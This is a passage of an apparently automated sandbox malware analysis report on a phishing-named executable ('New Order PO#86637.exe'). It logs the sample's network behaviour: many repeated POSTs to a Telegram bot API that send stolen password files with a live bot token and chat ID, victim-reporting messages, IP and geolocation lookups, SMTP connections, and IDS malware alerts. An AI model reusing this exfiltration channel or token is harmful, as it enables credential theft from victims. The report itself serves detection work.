                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf64364b823abHost: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf718b1633c98Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf6c726581a75Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf7aab7810d9fHost: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf75e097196acHost: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf96e2d7c1904Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf87acb7f0612Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf9f7d1a9f0d8Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf9041216e2b7Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcfc29d9a5cacaHost: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcfe505b5a8452Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf98f7b2e35edHost: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcfed3182d0166Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcfa10ca850f14Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd00e934167454Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcfdfaba9eabdaHost: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd01771edfcbecHost: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcfed4e660b567Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0417862dab04Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd002a375df3afHost: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd04a7c7a5e552Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd00d3dede440fHost: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd053f66608f0bHost: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd015205408852Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd05da1ef7e562Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd01e8a511992dHost: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd065e266dc598Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0270272e694bHost: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd08864f6f4d2dHost: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd02f8244d88ebHost: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd091525bd2ff7Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0b324555a5aaHost: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd06cf902e9b27Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcd873cf4d1d1fHost: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcd873cf4d1d1fHost: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 208.91.198.143 208.91.198.143
                      Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                      Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                      Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                      Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                      Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownDNS query: name: checkip.dyndns.org
                      Source: unknownDNS query: name: reallyfreegeoip.org
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49707 -> 132.226.247.73:80
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49704 -> 132.226.247.73:80
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49709 -> 132.226.247.73:80
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49719 -> 132.226.247.73:80
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49728 -> 132.226.247.73:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49706 -> 188.114.97.3:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49716 -> 188.114.97.3:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49710 -> 188.114.97.3:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49741 -> 188.114.97.3:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49735 -> 188.114.97.3:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49721 -> 188.114.97.3:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49729 -> 188.114.97.3:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49739 -> 188.114.97.3:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49726 -> 188.114.97.3:443
                      Source: global trafficTCP traffic: 192.168.2.5:49745 -> 208.91.199.223:587
                      Source: global trafficTCP traffic: 192.168.2.5:61592 -> 208.91.198.143:587
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49722 version: TLS 1.0
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: C:\Users\user\Desktop\New Order PO#86637.exeCode function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20and%20Time:%2019/09/2024%20/%2018:25:46%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965543%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20and%20Time:%2019/09/2024%20/%2021:04:09%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965543%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
